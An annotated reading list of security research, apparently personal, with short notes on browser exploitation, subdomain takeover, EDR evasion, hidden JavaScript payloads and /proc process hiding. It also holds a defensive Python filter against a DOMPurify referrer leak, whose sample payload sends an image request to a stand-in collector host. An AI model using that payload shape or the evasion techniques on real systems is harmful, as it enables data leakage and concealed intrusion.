Pressing Buttons with Popups (on Twitch, LinkedIn and more): Some very neat tricks (like the Double Clickjacking technique above) to generate a click on the OAuth dialog boxes of real targets. I learnt a bunch about how pop-unders work, and how browsers are trying to stop them. Finally, window.open() does not need user interaction on headless browsers.
Same Origin Method Execution: Another way to think about exploiting callback (e.g. JSONP) endpoints. The concept is surprisingly simple for its possible impact. I recommend watching the video before reading the whitepaper.
bfcache quirks: Insane research into how to exploit bfcache internals and in general sheds light on how Chrome caches sites.
GymTok: Breaking TLS Using the Alt-Svc Header: A MITM exploit built on the Alt-Svc header: a CRIME-style compression attack at the HTTPS level to leak appended secrets, certificate reuse between FTP and HTTPS, and finally tricking the browser's ALPN check in Alt-Svc by swapping which server the victim connects to.
DOM Clobbering cheatsheet: Some interesting nuggets on DOM Clobbering payloads that I did not know. The cid trick seems to stem from a PortSwigger lab; it basically allows a raw double quote in the href attribute of an <a> tag.
terjanq Same-Origin-XSS: A cool challenge demonstrating how a sandboxed iframe can have a null origin, and that a popup also inherits the iframe's sandbox attributes when allow-popups is set. A popup can also post messages to its window.opener object.
Subdomain takeover guide: Introduces the bug (or more like misconfiguration) class and how to exploit it. Mozilla MDN also has an excellent entry. Note that domain takeover is not limited to CNAME takeover, which is the scenario written up in both articles, but also includes NS takeover, as seen in this research.
Parser Differentials: How using multiple parsers in different languages can cause problems. It is so interesting to see programming languages disagree on a piece of “magic” YAML. Note to myself to revisit once I have the time.
DOMPurify Referrer Leak: Lab to highlight a (currently) exploitable quirk of DOMPurify that allows specifying a <meta> tag with an unsafe-url referrer policy. When DOMPurify parses the markup (e.g. a <meta> tag followed by an <img> tag), then even though the <meta> tag is removed, the <img> is loaded with the unsafe referrer policy. This allows leakage of any parameters in the URL.
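A defensive pre-filter for the pattern described above, added here as an example (not code from the lab or from DOMPurify): it walks untrusted markup before it reaches a sanitizer, drops every referrer <meta> tag, and reports each <img> that would otherwise have loaded under a full-URL referrer policy. It assumes the untrusted HTML arrives as a string; the sample input is constructed.

```python
from html.parser import HTMLParser

# Policies that send the full URL (query string included) to a cross-origin
# image host on an https -> https fetch. unsafe-url is the one from the lab.
LEAKY_POLICIES = {"unsafe-url", "no-referrer-when-downgrade"}

# Constructed sample: the lab's shape, a referrer <meta> followed by an <img>.
SAMPLE = ('<meta name="referrer" content="unsafe-url">'
          '<img src="https://collector.example/pixel">'
          '<p>hello</p>')


class ReferrerMetaFilter(HTMLParser):
    """Re-serialises markup without <meta name="referrer"> tags and records
    the <img> tags that followed a leaky policy declaration."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []        # filtered markup pieces
        self.policy = None   # policy set by the most recent referrer meta
        self.findings = []   # (policy, img src) pairs worth alerting on

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser already lowercases tag/attribute names
        if tag == "meta" and (a.get("name") or "").lower() == "referrer":
            self.policy = (a.get("content") or "").strip().lower()
            return  # drop the tag so it never reaches the sanitizer's parser
        if tag == "img" and self.policy in LEAKY_POLICIES:
            self.findings.append((self.policy, a.get("src", "")))
        self.out.append(self.get_starttag_text())  # raw tag text, verbatim

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # raw text keeps the trailing "/>"

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")


def filter_untrusted_html(markup):
    """Return (markup without referrer meta tags, list of flagged images)."""
    p = ReferrerMetaFilter()
    p.feed(markup)
    p.close()
    return "".join(p.out), p.findings
```

Pair this with a page-level Referrer-Policy header such as strict-origin-when-cross-origin so that a missed tag still cannot leak query parameters.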
Jailbreak your Enemies with a Link: Remote Execution on iOS: This sheds a lot of light on how the crazy browser exploits work. After reading this I understand the “magical” block of code that often does 1000 iterations of seemingly nothing.
Invisible JavaScript code: Hide a JavaScript payload in plain sight using Hangul filler characters. Might be very dangerous in supply chain attacks.
The (Anti-)EDR Compendium: Very well-written article about how EDR detects malware and how to circumvent them.
The ‘Invisibility Cloak’ - Slash-Proc Magic: Very cool research on how to hide malicious processes by manipulating the entries in the /proc folder. It also shows anomalies that can be used to detect this technique, and explains how ps works (to show why the malicious process disappears from ps output).
Tracking myself through in-app ads: Very cool to see how ads work. Solves a lot of the mystery for me about how these apps seem to react to my actions almost instantaneously after I click on an ad or search for something. The author has a follow-up article on setting up a local environment to explore how intrusive this in-app tracking is.